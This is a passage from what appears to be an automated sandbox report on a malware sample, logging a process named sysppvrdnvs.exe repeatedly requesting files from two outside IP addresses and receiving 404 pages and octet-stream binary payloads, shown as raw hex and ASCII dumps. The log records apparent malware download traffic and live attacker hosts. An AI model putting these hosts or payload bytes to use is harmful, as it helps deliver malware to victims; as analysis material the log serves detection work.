                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675678968 CEST1236INData Raw: 23 7c 3e 83 85 14 68 ea 2c 54 80 a4 6c 06 46 ff 5d b4 ac 5b 35 5e 08 a4 c1 ee 42 20 b5 e8 3c 27 31 4e e6 e6 7c 68 2f fe b2 d9 68 f1 cc b2 f9 8b 48 51 89 aa ea ec 64 8d 59 82 c0 21 3a 27 01 26 17 31 6c 91 bc eb b3 19 55 bf 3b 37 ed b6 a4 66 1f 95
                                                                                                                                                                                                    Data Ascii: #|>h,TlF][5^B <'1N|h/hHQdY!:'&1lU;7f=AGw:K6Y9?:}..c$Ygrj#h]cFM`oZTavqte9lU7EBUl;VQb9w%,#leGw
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.681169987 CEST1236INData Raw: 47 31 18 6d 9f 2c c4 84 e3 c5 a2 9f 16 6c d6 83 04 f3 4b 14 f0 08 e3 75 25 fe 41 3c 99 cb a1 eb 88 21 3d 20 d9 85 e6 75 2b 42 da 32 28 48 d9 d5 e2 f4 ab 99 31 9b 6c 10 3a 23 1d d6 ba dd 49 f2 7b 01 87 cb e2 a1 91 68 91 28 ae c4 c2 47 f2 7f 07 6c
                                                                                                                                                                                                    Data Ascii: G1m,lKu%A<!= u+B2(H1l:#I{h(Gl%N:=TTp7l\ebUQw4 @bW3K29=~8z/Bl,+qJycScJ=zbB~uLrT


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    16192.168.2.85439391.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:50.735877037 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:51.645658970 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:51 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    17192.168.2.85441491.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:53.687262058 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:54.578216076 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:54 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    18192.168.2.85443191.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:56.674020052 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:57.576061964 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:57 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    19192.168.2.85444891.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:59.744569063 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:00.635268927 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:00 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    20192.168.2.85446491.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:02.852070093 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:28:04.987108946 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:04 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    21192.168.2.854494185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:08.252206087 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167444944 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:09 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 110600
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a94a-1b008"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167609930 CEST212INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                                    Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167643070 CEST1236INData Raw: 83 e4 d1 90 29 7c aa 52 61 69 3e 26 79 cf e3 2b a4 eb a0 86 89 ee 8f 0a 65 18 75 20 96 42 1b 55 48 d4 6a a3 7b 79 30 ed be 6d a7 6c 87 55 ef 22 c3 f5 94 c8 33 a5 83 53 2b c4 c3 b9 90 cf 8a 0c fc cb a5 49 29 7e ad f0 f9 35 44 58 bc b7 23 1f 6f 26
                                                                                                                                                                                                    Data Ascii: )|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&Q{[Y`,OCG"GX! (|h'RTg$^,u1^*qd*cQm3PwL&izY
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167680979 CEST1236INData Raw: 02 73 94 7c 14 0e aa f5 e2 b8 40 61 24 1a 40 15 ef 62 57 45 85 0a 95 13 1c 99 a6 67 55 34 b3 4c e3 6c c9 df 4c b8 f9 00 9a a1 41 71 99 93 d4 bc b8 1e a9 35 3b 7a a6 23 40 95 fb d1 4d 91 a1 81 38 02 69 ff 64 38 a9 5b 0c b3 79 81 37 2a d8 94 b2 70
                                                                                                                                                                                                    Data Ascii: s|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167717934 CEST224INData Raw: 17 5f 0f 70 34 1e ae a2 24 cb 91 81 c7 90 a6 02 38 63 65 e1 35 a7 5c 4a fc a5 a0 41 7c fa ab ec 4d 5a 7a a8 cd f3 9d 2c c0 4a b6 e1 08 2d bf 09 5a 6f 0c 55 f3 a1 ca 08 53 b9 2d 96 2c f5 54 d0 f6 e9 c7 e4 16 91 cf 60 d5 69 da 3f 60 78 a9 71 63 5b
                                                                                                                                                                                                    Data Ascii: _p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LO
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167749882 CEST1236INData Raw: 0e 99 b0 52 f7 39 2e cc a6 30 18 05 be 19 11 b9 44 64 00 72 e6 ab 28 a2 a6 a2 94 18 64 c9 84 4c 5d b9 c9 c6 56 a2 63 58 2f f8 c3 4e 3d 6b 96 14 54 91 a5 d6 2c 66 5c 7f fc 09 86 26 4b 6b 87 a1 7e db 8c 1b 06 0c 44 94 b6 8b 4d ce fa 84 75 c0 e8 db
                                                                                                                                                                                                    Data Ascii: R9.0Ddr(dL]VcX/N=kT,f\&Kk~DMub;/Gf%A&>thWZq.%?!Us. |v43@^k#fk1'&b~iV@|,,@|Pc('"NT3U?A}?m_
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167787075 CEST1236INData Raw: bf e0 16 da 81 f6 84 35 27 d6 ef 74 9a 3d 1a cb 65 63 99 e9 ec 2a ec 6a 74 27 b6 34 e7 e0 38 9c 1f bd 84 c7 dd 5d 7e e8 48 a4 d8 f8 44 7b 6e a3 ed a1 ad 86 a6 86 56 bb 53 ac a1 28 d7 bd 27 4d a3 8f fc 96 cd 1b 45 18 db 7b b1 2c 9c 60 20 ba 19 27
                                                                                                                                                                                                    Data Ascii: 5't=ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8kgy$
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167821884 CEST1236INData Raw: 8c 88 0e 60 91 bf ab 6a 4c 72 e8 db d7 7a 67 28 d6 c6 01 2c 3d 2d 4c 98 3c d5 c2 bb 7a 20 67 e8 b5 c8 62 12 bb 0d be 5d 6b 63 d5 b8 d9 cf 76 b6 d5 53 0e c0 5d f2 84 03 26 79 78 c2 d4 60 35 9c 49 80 8e d5 5d c1 e3 7c 99 ec aa e5 5c ae dd a7 55 39
                                                                                                                                                                                                    Data Ascii: `jLrzg(,=-L<z gb]kcvS]&yx`5I]|\U9|U2}!#m<R122do*z:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/*V\3V*W]
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167856932 CEST436INData Raw: 03 67 25 d2 db da c7 c3 b5 15 68 a6 14 cd 56 60 47 0b 9a 54 1a 8c ee bf a8 31 cd bb 22 dc be 9b 16 2f b5 03 00 e1 8f b6 86 97 ba d9 a6 60 2f 5a 56 98 9b c4 8e 78 0c e0 4f f2 ab 29 c8 b6 f6 ec e4 57 74 e1 42 50 81 af e8 17 0e 76 2f e1 87 0e 48 6b
                                                                                                                                                                                                    Data Ascii: g%hV`GT1"/`/ZVxO)WtBPv/Hk&/'`gM<Zs3UB`>-XY)#4&~[Yzhvy,@xWY>/ !P(I,SkM79q(4jOOxq"
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.167892933 CEST1236INData Raw: ab 02 4f b7 77 b8 d6 61 8c 11 cc 35 fe dd fa 9c b3 17 68 68 79 58 d6 91 26 cb cf cc ff bc 31 bd d3 10 2f e7 12 fb 76 06 2e ea b6 26 10 d4 f3 20 fe 37 f6 ff 94 8c ba 34 7d 80 44 10 e4 dc e2 fa 7e bc 22 bd 92 c3 af ae 7d d5 f4 d6 2d 54 ac a6 4e 03
                                                                                                                                                                                                    Data Ascii: Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t~>,lmhPA~FE
                                                                                                                                                                                                    Oct 26, 2024 07:28:09.173373938 CEST1236INData Raw: ab 7d 9c ac c4 aa 17 1d 59 5a 32 3a b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88 a8 e5 70 d0 fd 3b 67 61 4f 29 89 ec 5b 34 2e 01 91 1a 92 89 57 ab 91 7b
                                                                                                                                                                                                    Data Ascii: }YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    22192.168.2.854513185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:11.224123955 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:12.147619009 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:12 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 8960
                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "671230ee-2300"
                                                                                                                                                                                                    Accept-Ranges: bytes
